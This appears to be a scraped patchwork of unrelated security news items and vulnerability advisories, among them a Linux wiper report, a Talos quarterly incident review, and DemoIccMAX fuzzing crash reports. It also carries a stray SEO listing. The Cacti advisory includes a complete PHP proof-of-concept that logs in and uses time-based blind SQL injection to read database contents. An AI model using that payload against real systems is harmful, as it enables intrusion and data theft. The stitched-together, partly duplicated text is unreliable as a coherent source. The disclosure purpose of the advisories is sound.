A pro-Hamas hacktivist group has been observed using a new Linux-based wiper malware dubbed BiBi-Linux Wiper, targeting Israeli entities amidst the ongoing Israeli-Hamas war.
"This malware is an x64 ELF executable, lacking obfuscation or protective measures," Security Joes said in a new report published today. "It allows attackers to specify target folders and can potentially destroy an entire

A pro-Hamas hacktivist group has been observed using a new Linux-based wiper malware dubbed **BiBi-Linux Wiper**, targeting Israeli entities amidst the ongoing Israeli-Hamas war.

"This malware is an x64 ELF executable, lacking obfuscation or protective measures," Security Joes said in a new report published today. "It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions."

Some of its other capabilities include multithreading to corrupt files concurrently to enhance its speed and reach, overwriting files, renaming them with an extension containing the hard-coded string "BiBi" (in the format "\[RANDOM\_NAME\].BiBi\[NUMBER\]"), and excluding certain file types from being corrupted.

"While the string "bibi" (in the filename), may appear random, it holds significant meaning when mixed with topics such as politics in the Middle East, as it is a common nickname used for the Israeli Prime Minister, Benjamin Netanyahu," the cybersecurity company added.

The destructive malware, coded in C/C++ and carrying a file size of 1.2 MB, allows the threat actor to specify target folders via command-line parameters, by default opting for the root directory ("/") if no path is provided. However, performing the action at this level requires root permissions.

Another notable aspect of BiBi-Linux Wiper is its use of the nohup command during execution so as to run it unimpeded in the background. Some of the file types that are skipped from being overwritten are those with the extensions .out or .so.

"This is because the threat relies on files such as bibi-linux.out and nohup.out for its operation, along with shared libraries essential to the Unix/Linux OS (.so files)," the company said.

The development comes as Sekoia revealed that the suspected Hamas-affiliated threat actor known as Arid Viper (aka APT-C-23, Desert Falcon, Gaza Cyber Gang, and Molerats) is likely organized as two sub-groups, with each cluster focused on cyber espionage activities against Israel and Palestine, respectively.

"Targeting individuals is a common practice of Arid Viper," SentinelOne researchers Tom Hegel and Aleksandar Milenkoski said in an analysis released last week.

"This includes pre-selected Palestinian and Israeli high-profile targets as well as broader groups, typically from critical sectors such as defense and government organizations, law enforcement, and political parties or movements."

Attack chains orchestrated by the group include social engineering and phishing attacks as initial intrusion vectors to deploy a wide variety of custom malware to spy on its victims. This comprises Micropsia, PyMicropsia, Arid Gopher, and BarbWire, and a new undocumented backdoor called Rusty Viper that's written in Rust.

"Collectively, Arid Viper's arsenal provides diverse spying capabilities such as recording audio with the microphone, detecting inserted flash drives and exfiltrating files from them, and stealing saved browser credentials, to name just a few," ESET noted earlier this month.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pro-Hamas Hacktivists Targeting Israeli Entities with Wiper Malware

In International Color Consortium DemoIccMAX 79ecb74, CIccXformMatrixTRC::GetCurve in IccCmm.cpp in libSampleICC.a has a NULL pointer dereference.

CVE-2023-46867: Bugs from Fuzzing · Issue #54 · InternationalColorConsortium/DemoIccMAX

SQL Injection vulnerability in Cacti v1.2.25 allows a remote attacker to obtain sensitive information via the form_actions() function in the managers.php function.

Package cacti Affected versions <=1.2.25 Patched versions None Summary A SQL Injection vulnerability discovered in managers.php allowed authenticated users to access database information. Details SQL Injection vulnerability discovered in managers.php. In function form\_actions(), request\_var 'selected\_items' is joined into into SQL statements without security checks. source code: function form\_actions() { global $manager\_actions, $manager\_notification\_actions; if (isset\_request\_var('selected\_items')) { if (isset\_request\_var('action\_receivers')) { $selected\_items = cacti\_unserialize(stripslashes(get\_nfilter\_request\_var('selected\_graphs\_array'))); if ($selected\_items != false) { if (get\_nfilter\_request\_var('drp\_action') == '1') { // delete db\_execute('DELETE FROM snmpagent\_managers WHERE id IN (' . implode(',' ,$selected\_items) . ')'); db\_execute('DELETE FROM snmpagent\_managers\_notifications WHERE manager\_id IN (' . implode(',' ,$selected\_items) . ')'); db\_execute('DELETE FROM snmpagent\_notifications\_log WHERE manager\_id IN (' . implode(',' ,$selected\_items) . ')'); } elseif (get\_nfilter\_request\_var('drp\_action') == '2') { // enable db\_execute("UPDATE snmpagent\_managers SET disabled = '' WHERE id IN (" . implode(',' ,$selected\_items) . ')'); } elseif (get\_nfilter\_request\_var('drp\_action') == '3') { // disable db\_execute("UPDATE snmpagent\_managers SET disabled = 'on' WHERE id IN (" . implode(',' ,$selected\_items) . ')'); } header('Location: managers.php?header=false'); exit; } PoC $url = \["http://localhost/cacti/", "http://192.168.80.128/cacti/",\]; $url = $url\[1\]; $username = 'admin'; $password = 'password'; $login = "index.php?action=login&login\_username=$username&login\_password=$password"; $injectSQLcode1=serialize(\["1 ) or if ('admin' = (SELECT username FROM user\_auth WHERE id = 1 ), sleep(5), 0"\]); $injectSQLcode2=serialize(\["1 ) or if ('error' = (SELECT username FROM user\_auth WHERE id = 1 ), sleep(5), 0"\]); $target = "managers.php?action=actions&selected\_items=1&action\_receivers=1&drp\_action=1&selected\_graphs\_array="; function curlPage($url, $cookie=false){ $curl = curl\_init(); curl\_setopt($curl, CURLOPT\_URL, $url); curl\_setopt($curl, CURLOPT\_HEADER, 1); curl\_setopt($curl, CURLOPT\_RETURNTRANSFER, 1); curl\_setopt($curl, CURLOPT\_CONNECTTIMEOUT, 60); curl\_setopt($curl, CURLOPT\_TIMEOUT, 60); if($cookie){ curl\_setopt($curl, CURLOPT\_COOKIE,$cookie); } $data = curl\_exec($curl); echo "\[++Debug++\] ".$url."\\n"; curl\_close($curl); return $data; } function getSQLinjectionPage(){ global $url, $login, $target, $injectSQLcode1, $injectSQLcode2; //login $data1 = curlPage($url.$login); //echo $data1."\\n"; //get cookie $cookie = substr($data1, strpos($data1, 'Set-Cookie: ') + 12, 32); echo '\[++Debug++\] Cacti Cookie: '.$cookie."\\n"; //check login $data2 = curlPage($url."index.php", $cookie); //echo substr($data2, 0, 300)."\\n\\n"; //time of correct test $time1 = time(); $data3 = curlPage($url.$target.urlencode($injectSQLcode1), $cookie); $time1 = time() - $time1; echo "\[++result++\] time of correct test: ".$time1."\\n\\n"; //time of error test $time2 = time(); $data3 = curlPage($url.$target.urlencode($injectSQLcode2), $cookie); $time2 = time() - $time2; echo "\[++result++\] time of error test: ".$time2."\\n\\n"; if( $time2 <=1 and $time1 >= 5){ echo "\[++result++\] Time difference exist, vulnerability exsit!"."\\n\\n"; }else{ echo "\[++result++\] No time difference, vulnerability not exsit"."\\n\\n"; } } //set ip, port, username, password, InjectCode first getSQLinjectionPage(); Impact Although there is no echo，by measuring the time delay of accessing the website, authenticated users can obtain mysql database content.

CVE-2023-46490: CVE-2023-46490

Emerging RaaS operation uses Rhysida ransomware paired with a wicked infostealer called Lumar, researchers warn.

Operating since last May, an emerging ransomware strain called Rhysida was deployed along with new stealer malware called Lumar for a potent new one-two punch against Brazil's popular PIX payment system users.

Researchers from Kaspersky reported Rhysida is functioning as a ransomware-as-a-service (RaaS) operation with a demonstrated ability to quickly evolve.

"It stands out for its unique self-deletion mechanism and compatibility with pre-Windows 10 versions of Microsoft. Written in C++ and compiled with MinGW and shared libraries, Rhysida showcases sophistication in its design," Kaspersky said in its findings about the group. "While relatively new, Rhysida faced initial configuration challenges with its onion server, revealing a group's rapid adaptation and learning curve."

The ransomware campaign targeting PIX has been ongoing since December 2022, the Kaspersky team noted, adding that Rhysida was deployed along with a complimentary malware-as-a-service (MaaS) infostealer called Lumar to target users of the payment system.

Lumar first emerged in July 2023, the report added, and can steal data on Telegram sessions, passwords, cookies, autofill information, desktop files, and even cryptographic wallets.

Notably, the Kaspersky team said the Lumar stealer is compact, without sacrificing functionality.

"The malware's efficient data collection is facilitated by the use of three separate threads," the report added. "The C2, hosted by the malware author as a Malware as a Service (MaaS), provides user-friendly features such as statistics and data logs. Users can download the latest version of Lumar and receive Telegram notifications for incoming data."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Meet Rhysida, a New Ransomware Strain That Deletes Itself

By Owais Sultan
Looking for a SaaS SEO consultant? We’ve rounded up the top 15 SaaS SEO experts you need to…
This is a post from HackRead.com Read the original post: 15 Best SaaS SEO Experts That Will Help You Dominate Online

15 Best SaaS SEO Experts That Will Help You Dominate Online

We observed the BlackByte ransomware group’s new variant, BlackByte NT, for the first time in addition to the previously seen LockBit ransomware, which continues to be the top observed ransomware family in Talos IR engagements.

Tuesday, October 24, 2023 08:10

**Quarterly threat report: Telecommunications and education are most-targeted verticals**

There was a notable increase in threats to web applications, accounting for 30 percent of the engagements Cisco Talos Incident Response (Talos IR) responded to in the third quarter of 2023, compared to 8 percent the previous quarter. Exploitation of public-facing applications was the top observed means of gaining initial access, accounting for 30 percent of engagements. The high number of web application attacks likely played a significant role in the increase this quarter.  

However, ever-present ransomware continues to be a threat, accounting for 10 percent of engagements. This quarter, which covers July, August and September, featured the LockBit and BlackByte ransomware families, which Talos IR has observed in previous quarters. But for the very first time, Talos IR observed a new variant of BlackByte ransomware, BlackByte NT. 

 Telecommunications and education were the most targeted verticals, each accounting for 20 percent of engagements. Threat actors and groups with varying motives and sophistication frequently targeted telecommunications organizations, continuing a trend where it was consistently a top-targeted industry vertical in 2022, according to Talos IR.  

Telecommunications companies are attractive targets due to their control over several critical infrastructure assets, serving as a gateway for adversaries to access other businesses, subscribers, or third-party providers. These organizations also have a large amount of customer data that is often targeted by financially motivated cybercriminals such as ransomware groups.   

Educational institutions are continuously targeted by cybercriminals due to vast amounts of personally identifiable student data, including financial and counseling records, as well as research institutes rich in intellectual property. Many education organizations have limited budgets devoted to cybersecurity, hampering defenses.      

**Web application targeting on the rise **

Attacks against web applications — and subsequent post-compromise activity — were the top-observed threat in Q3, accounting for 30 percent of engagements, a significant increase compared to the previous quarter. After gaining initial access, adversaries leveraged techniques such as launching web injection attacks, deploying web shells, and using commercial off-the-shelf frameworks such as Supershell, which deploys web shells to maintain access to a system. Talos IR is seeing a growing trend of adversaries leveraging advanced functionalities of various command and control (C2) frameworks, such as the newly observed Supershell C2 framework, to identify weaknesses in web servers and deploy web shells more easily. 

Supershell is a web-based management platform that allows attackers to remotely execute commands, manage compromised systems, and collaborate with multiple users. Before downloading Supershell, the attackers placed malicious XML inputs containing a reference to an external entity using XML external entity (XXE) injection attacks in hopes the web server had a misconfigured XML parser. Based on our analysis, Supershell appears to be designed for predominantly Chinese-speaking individuals as the tool is written for a Chinese-only web interface console. There is also a clear preference for Chinese in Supershell’s GitHub documentation, although an English-translated option exists.  

Although the development of recent frameworks that make the deployment of web shells easier benefits sophisticated adversaries, these frameworks may also reduce the barrier for entry for less sophisticated attackers. Given the growing trend of commercial off-the-shelf C2 frameworks within the last year, including Alchimist and Manjusaka, it is likely this trend will continue to play out as adversaries increasingly turn to adopt additional capabilities for performing web-based attacks. 

Web shells are malicious scripts that enable threat actors to compromise web-based servers exposed to the internet. Talos IR responded to an engagement where attackers uploaded several PHP web shells to an unpatched web server, demonstrating how threat actors commonly chain together web shells to build a more flexible toolkit. Within this cluster of activity, the attackers could not further carry out any post-compromise objectives due to the presence of a Web Application Firewall (WAF), highlighting the importance of implementing a WAF between public-facing servers and the Internet to help defend against these attacks.   

In several engagements this quarter, we observed adversaries leveraging Structured Query Language injection (SQLi) attacks, a technique in which adversaries enter SQL commands into an input field that does not use validation and sanitization. We increasingly see adversaries continue to use scanning frameworks to launch SQLi attacks. In one cluster of activity, Talos IR identified multiple SQLi attempts and more than 1,000 instances of SQLMap, an open-source utility often used to identify and exploit SQLi vulnerabilities. Adversaries also used a SQL injection module within Nessus, a proprietary vulnerability scanner, highlighting the threat actor’s intent on identifying SQLi vulnerabilities for expanded access.  

**Ransomware remains a threat **

Ransomware activity continued this quarter accounting for 10 percent of total IR engagements in Q3. We observed the BlackByte ransomware group’s new variant, BlackByte NT, for the first time in addition to the previously seen LockBit ransomware, which continues to be the top observed ransomware family in Talos IR engagements. 

LockBit was one of the most prevalent variants seen in Talos IR engagements since September 2022, consistent with a wide body of reporting calling LockBit one of the most active ransomware threats this year.  

Talos IR responded to a LockBit ransomware attack where the adversaries gained an initial foothold into the environment by compromising a valid contractor account. Once inside, attackers began dumping credentials from internal systems and were able to create an administrator account to elevate privileges and remain persistent in the environment. To evade detection, the attackers cleared the Windows event logs and disabled several security tools, including endpoint detection and response (EDR) and antivirus. LockBit established C2 channels via multiple methods, including the adversary simulation tool Cobalt Strike and the legitimate remote access software AnyDesk. The attackers modified domain policies to create a scheduled task that eventually executed the LockBit ransomware binary.  

Talos IR has previously observed BlackByte ransomware, but this quarter was the first time seeing the new variant, BlackByte NT. Unlike the former variants, this new variant (aka BlackByte 2.0) is written entirely in C++ and was discovered in May 2023. 

Talos IR observed the new BlackByte NT ransomware variant where the attackers initially compromised a valid account to gain access. Several accounts with administrator privileges were created in this engagement as well, showing ransomware actors’ reliance on account creation to escalate privileges and enable persistence. Attackers then used a combination of RDP, SSH, and Server Message Block (SMB) for lateral movement. Using the open-source Secure File Transfer Protocol (SFTP) tool WinSCP, adversaries exfiltrated data from the environment. Before encryption, the attackers cleared the Windows event logs to cover their tracks and deleted the shadow volume copies to inhibit system recovery, consistent with ransomware TTPs. Ransomware was propagated across the environment via SMB admin shares, a common distribution method also observed in ransomware attacks.   

**New ShroudedSnooper actor observed using custom backdoors **

This quarter also featured a new advanced persistent threat (APT) ShroudedSnooper targeting telecommunications firms in the Middle East. This activity is a continuation of a trend we have been monitoring over the past several years in which sophisticated actors are frequently targeting telecommunications organizations, a top-targeted industry vertical this quarter and throughout 2022, according to Talos IR. As part of this activity, ShroudedSnooper deployed two novel backdoor implants we dubbed “HTTPSnoop” and “PipeSnoop.” 

These backdoors interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint. Talos IR observed DLL- and EXE-based versions of the implants that masquerade as legitimate security software components, and specifically extended detection and response (XDR) agents, making detection challenging.  

**Initial vectors **

Exploitation of public-facing applications was the top observed means of gaining initial access, accounting for 30 percent of engagements. The high number of web application attacks likely played a significant role in the increase this quarter.   

**Security weaknesses **

Unpatched or misconfigured applications and a lack of multi-factor authentication (MFA) were tied to the top security weaknesses, each accounting for 40 percent of engagements. This activity aligns with the top two initial access vectors used by adversaries this quarter, including exploiting public-facing applications and abusing valid accounts. Talos IR frequently observes attacks that could have been prevented if MFA was enabled on critical services, such as RDP. Talos IR recommends expanding MFA for all user accounts, such as employee, contractor and business partner accounts.   

Staying up-to-date with software updates on public-facing applications is a crucial aspect of an organization’s security posture. Attackers often exploit vulnerabilities to achieve post-compromise objectives, such as privilege escalation. While vulnerability and patch management are critical, it is not always possible to immediately apply every security patch due to the complexity of enterprise networks. Talos IR recommends prioritizing critical vulnerabilities that pose the biggest threats to preventing exploitation.   

Misconfigurations can also leave organizations exposed regardless of an adversary’s intention. Talos IR frequently sees actors compromising systems that were misconfigured to be exposed publicly. Attackers often take the path of least resistance by leveraging vulnerabilities and exposures, highlighting that organizations need to be proactive in ensuring both systems and tools are configured properly.    

**Top observed MITRE ATT&CK techniques **

The table below represents the MITRE ATT&CK techniques observed in this quarter’s IR engagements, which includes relevant examples and the volume Talos IR saw in engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note this is not an exhaustive list. 

Key findings from the MITRE ATT&CK framework include: 

*   Exploitation of public-facing applications was the top observed means of gaining initial access this quarter, accounting for 30 percent of total engagements.  
*   Attackers abused remote services, such as RDP, to move laterally in 25 percent of engagements. 
*   AnyDesk was observed in all ransomware and pre-ransomware engagements this quarter, underscoring its role in ransomware affiliates' attack chains.   
*   Indicator removal, such as clearing Windows event logs and file deletion, was the top defense evasion technique observed.   
*   In 25 percent of engagements this quarter, Talos IR observed attackers abusing scheduled tasks for continuous execution of malicious code to maintain persistence on an endpoint.    

Initial Access (TA0001)  

Example  

T1190 Exploit in Public-Facing Application  

Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet    

Execution (TA0002)  

Example  

T1059.001 Command and Scripting Interpreter: PowerShell  

Executes PowerShell code to retrieve information about the client’s Active Directory environment  

Persistence (TA0003)  

Example  

T1053.005 Scheduled Task / Job: Scheduled Task  

Scheduled tasks were created on a compromised server  

Defense Evasion (TA0005)  

Example  

T1134.002 Access Token Manipulation: Create Process with Token  

Attackers created a new process using the command “run as”  

Credential Access (TA0006)  

Example  

T1003.001 OS Credential Dumping: LSASS Memory  

Use “lsass.exe” for stealing password hashes from memory  

Lateral Movement (TA0008)  

Example  

T1021.001 Remote Services: Remote Desktop Protocol  

Adversary made attempts to move laterally using Windows Remote Desktop   

Command and Control (TA0011)  

Example  

T1219 Remote Access Software  

Remote access tools found on the compromised system    

Exfiltration (TA0010)  

Example  

T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol  

Using FTP for file exfiltration  

Impact (TA0040)  

Example  

T1486 Data Encrypted for Impact  

Deploy LockBit ransomware and encrypt critical systems

Attacks on web applications spike in third quarter, new Talos IR data shows

In International Color Consortium DemoIccMAX 79ecb74, there is an out-of-bounds read in the CIccPRMG::GetChroma function in IccProfLib/IccPrmg.cpp in libSampleICC.a.

**Stack Buffer & Global Overflow Patches by @h02332 for DemoICCMax****Summary**

There is a stack buffer overflow at the icFixXml function and there is a global buffer overflow in the CIccPRMG::GetChroma function.

**Bug 1**

There is a stack buffer overflow at the icFixXml function, which is defined in IccUtilXml.cpp at line 330. The overflow occurs on a variable named 'fix', which is defined in IccTagXml.cpp at line 337.

    Error Details:
    Error Type: Stack buffer overflow.
    File: IccUtilXml.cpp
    Function: icFixXml
    Line: 330
    Variable Affected: 'fix' (defined in IccTagXml.cpp at line 337)
    Memory Affected: Address 0x7ff7b129ad20
    

**PoC**

     ./iccToXml ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc new.xml
    iccToXml(12862,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    
    ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ff7b129ad20 at pc 0x00010f569ed9 bp 0x7ff7b129ab70 sp 0x7ff7b129ab68
    WRITE of size 1 at 0x7ff7b129ad20 thread T0
        #0 0x10f569ed8 in icFixXml(char*, char const*) IccUtilXml.cpp:330
        #1 0x10f4ff381 in CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccTagXml.cpp:353
        #2 0x10f4eb22a in CIccProfileXml::ToXmlWithBlanks(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccProfileXml.cpp:264
        #3 0x10f4e632c in CIccProfileXml::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccProfileXml.cpp:79
        #4 0x10ec6821f in main IccToXml.cpp:38
        #5 0x7ff80dee53a5 in start+0x795 (dyld:x86_64+0xfffffffffff5c3a5)
    
    Address 0x7ff7b129ad20 is located in stack of thread T0 at offset 288 in frame
        #0 0x10f4fed5f in CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccTagXml.cpp:336
    
      This frame has 7 object(s):
        [32, 288) 'fix' (line 337) <== Memory access at offset 288 overflows this variable
        [352, 608) 'buf' (line 338)
        [672, 928) 'data' (line 339)
        [992, 1016) 'datastr' (line 340)
        [1056, 1080) 'agg.tmp'
        [1120, 1144) 'ref.tmp' (line 351)
        [1184, 1208) 'ref.tmp45' (line 360)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow IccUtilXml.cpp:330 in icFixXml(char*, char const*)
    Shadow bytes around the buggy address:
      0x7ff7b129aa80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ab00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ab80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ac00: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ac80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x7ff7b129ad00: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00 00 00
      0x7ff7b129ad80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ae00: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2
      0x7ff7b129ae80: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129af00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129af80: 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 f2
    

**Expected Output**

    ./iccToXml ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc new.xml
    XML successfully created
    

**Bug 2**

There is a global buffer overflow, that can potentially be exploited to execute arbitrary code or lead to undefined behavior.

    Error Details:
    Error Type: Global buffer overflow.
    File: IccPrmg.cpp
    Function: CIccPRMG::GetChroma
    Line: 163
    Affected Variable: 'icPRMG_Chroma' defined in IccPrmg.cpp
    Memory Affected: Address 0x000103847bf0
    

**PoC**

    ./iccRoundTrip ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc
    iccRoundTrip(12888,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    =================================================================
    ==12888==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000103847bf0 at pc 0x00010365ce45 bp 0x7ff7bd5f1a80 sp 0x7ff7bd5f1a78
    READ of size 4 at 0x000103847bf0 thread T0
        #0 0x10365ce44 in CIccPRMG::GetChroma(float, float) IccPrmg.cpp:163
        #1 0x10365cefd in CIccPRMG::InGamut(float, float, float) IccPrmg.cpp:170
        #2 0x10365d151 in CIccPRMG::InGamut(float*) IccPrmg.cpp:183
        #3 0x10365de40 in CIccPRMG::EvaluateProfile(CIccProfile*, icRenderingIntent, icXformInterp, bool) IccPrmg.cpp:240
        #4 0x10365ea4e in CIccPRMG::EvaluateProfile(char const*, icRenderingIntent, icXformInterp, bool) IccPrmg.cpp:288
        #5 0x102913176 in main iccRoundTrip.cpp:177
        #6 0x7ff80dee53a5 in start+0x795 (dyld:x86_64+0xfffffffffff5c3a5)
    
    0x000103847bf0 is located 0 bytes after global variable 'icPRMG_Chroma' defined in '/Users/xss/Downloads/DemoIccMAX-master/IccProfLib/IccPrmg.cpp' (0x103847060) of size 2960
    SUMMARY: AddressSanitizer: global-buffer-overflow IccPrmg.cpp:163 in CIccPRMG::GetChroma(float, float)
    Shadow bytes around the buggy address:
      0x000103847900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x000103847b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]f9
      0x000103847c00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847c80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847d00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847d80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847e00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    

**Expected Output**

    ./iccRoundTrip ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc
    iccRoundTrip(29379,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    Profile:          '/Users/xss/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc'
    Rendering Intent: Relative Colorimetric
    Specified Gamut:  Not Specified
    
    Round Trip 1
    ------------
    Min DeltaE:        0.00
    Mean DeltaE:       1.46
    Max DeltaE:        7.05
    
    Max L, a, b:   32.481213, 7.808893, 7.558380
    
    Round Trip 2
    ------------
    Min DeltaE:        0.00
    Mean DeltaE:       0.64
    Max DeltaE:        2.81
    
    Max L, a, b:   39.559242, 7.503039, -29.157310
    
    PRMG Interoperability - Round Trip Results
    ------------------------------------------------------
    DE <= 1.0 (   25388):  12.6%
    DE <= 2.0 (   33627):  16.7%
    DE <= 3.0 (   36466):  18.1%
    DE <= 5.0 (   42342):  21.0%
    DE <=10.0 (   58679):  29.1%
    Total     (  201613)
    

**Build**

    cmake -DCMAKE_INSTALL_PREFIX=$HOME/.local -DCMAKE_BUILD_TYPE=Debug -DCMAKE_CXX_FLAGS="-g -fsanitize=address -fno-omit-frame-pointer -Wall -std=c++17" ../Build/Cmake
    make
    

**Testing****OS**

    ProductName:		macOS
    ProductVersion:		14.0
    BuildVersion:		23A344
    

**Platform****Data**

Various inputs from CVE-2022-26730 and CVE-2023-32443 were used as PoC's

**Crash Reports****icFixXml(char\*, char const\*) + 410**

    Crashed Thread:        0  Dispatch queue: com.apple.main-thread
    
    Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
    Exception Codes:       KERN_INVALID_ADDRESS at 0x00007ff7b34d7000
    Exception Codes:       0x0000000000000001, 0x00007ff7b34d7000
    
    Termination Reason:    Namespace SIGNAL, Code 11 Segmentation fault: 11
    Terminating Process:   exc handler [9557]
    
    VM Region Info: 0x7ff7b34d7000 is not in any region.  Bytes after previous region: 1  Bytes before following region: 1519771648
          REGION TYPE                    START - END         [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
          Stack                    7ff7b2cd7000-7ff7b34d7000 [ 8192K] rw-/rwx SM=SHM  thread 0
    --->  GAP OF 0x5a95e000 BYTES
          unused __TEXT            7ff80de35000-7ff80de9d000 [  416K] r-x/r-x SM=COW  ...ed lib __TEXT
    
    Thread 0 Crashed::  Dispatch queue: com.apple.main-thread
    0   iccToXml                      	       0x10cadb4fa icFixXml(char*, char const*) + 410
    1   iccToXml                      	       0x10ca90027 CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) + 1431
    2   ???                           	0x6161616161616161 ???
    
    
    Thread 0 crashed with X86 Thread State (64-bit):
      rax: 0x00007ff7b34d7000  rbx: 0x000000010d301bf0  rcx: 0x0000000000000061  rdx: 0x00007ff7b34d7001
      rdi: 0x00007ff7b34d6e62  rsi: 0x00007ff7b34d6e68  rbp: 0x00007ff7b34d4310  rsp: 0x00007ff7b34d42b0
       r8: 0x0000000000000006   r9: 0x0000000000000000  r10: 0x000000000000000d  r11: 0x00007ff6a68674fd
      r12: 0x00007ff7b34d6600  r13: 0x0000000000000000  r14: 0x000000010ca2b650  r15: 0x00007ff7b34d6780
      rip: 0x000000010cadb4fa  rfl: 0x0000000000010202  cr2: 0x00007ff7b34d7000
      
    Logical CPU:     0
    Error Code:      0x00000006 (no mapping for user data write)
    Trap Number:     14
    
    Thread 0 instruction stream:
      44 19 00 e8 42 52 17 00-48 8b 75 e8 48 81 c6 04  D...BR..H.u.H...
      00 00 00 48 89 75 e8 48-89 45 a8 e9 42 00 00 00  ...H.u.H.E..B...
      48 8b 7d e8 48 8d 35 ac-44 19 00 e8 1a 52 17 00  H.}.H.5.D....R..
      48 8b 75 e8 48 81 c6 04-00 00 00 48 89 75 e8 48  H.u.H......H.u.H
      89 45 a0 e9 1a 00 00 00-48 8b 45 f0 8a 08 48 8b  .E......H.E...H.
      45 e8 48 89 c2 48 81 c2-01 00 00 00 48 89 55 e8  E.H..H......H.U.
     [88]08 48 8b 45 f0 48 05-01 00 00 00 48 89 45 f0  ..H.E.H.....H.E.	<==
      e9 69 fe ff ff 48 8b 45-e8 c6 00 00 48 8b 45 f8  .i...H.E....H.E.
      48 83 c4 60 5d c3 55 48-89 e5 48 83 ec 20 48 89  H..`].UH..H.. H.
      7d f8 48 89 75 f0 89 55-ec 48 8b 7d f8 48 8b 75  }.H.u..U.H.}.H.u
      f0 48 63 55 ec e8 ac f0-ff ff 48 8b 7d f8 88 45  .HcU......H.}..E
      eb e8 76 33 17 00 48 83-c4 20 5d c3 66 2e 0f 1f  ..v3..H.. ].f...
    

**CIccPRMG::GetChroma(float, float) + 1093 (IccPrmg.cpp:163)**

    Crashed Thread:        0  Dispatch queue: com.apple.main-thread
    
    Exception Type:        EXC_CRASH (SIGABRT)
    Exception Codes:       0x0000000000000000, 0x0000000000000000
    
    Termination Reason:    Namespace SIGNAL, Code 6 Abort trap: 6
    Terminating Process:   iccRoundTrip [12888]
    
    Application Specific Information:
    abort() called
    
    
    Thread 0 Crashed::  Dispatch queue: com.apple.main-thread
    0   libsystem_kernel.dylib        	    0x7ff80e2357a6 __pthread_kill + 10
    1   libsystem_pthread.dylib       	    0x7ff80e26df30 pthread_kill + 262
    2   libsystem_c.dylib             	    0x7ff80e18ca4d abort + 126
    3   libclang_rt.asan_osx_dynamic.dylib	       0x103b39516 __sanitizer::Abort() + 70
    4   libclang_rt.asan_osx_dynamic.dylib	       0x103b38c74 __sanitizer::Die() + 196
    5   libclang_rt.asan_osx_dynamic.dylib	       0x103b1cf2a __asan::ScopedInErrorReport::~ScopedInErrorReport() + 1178
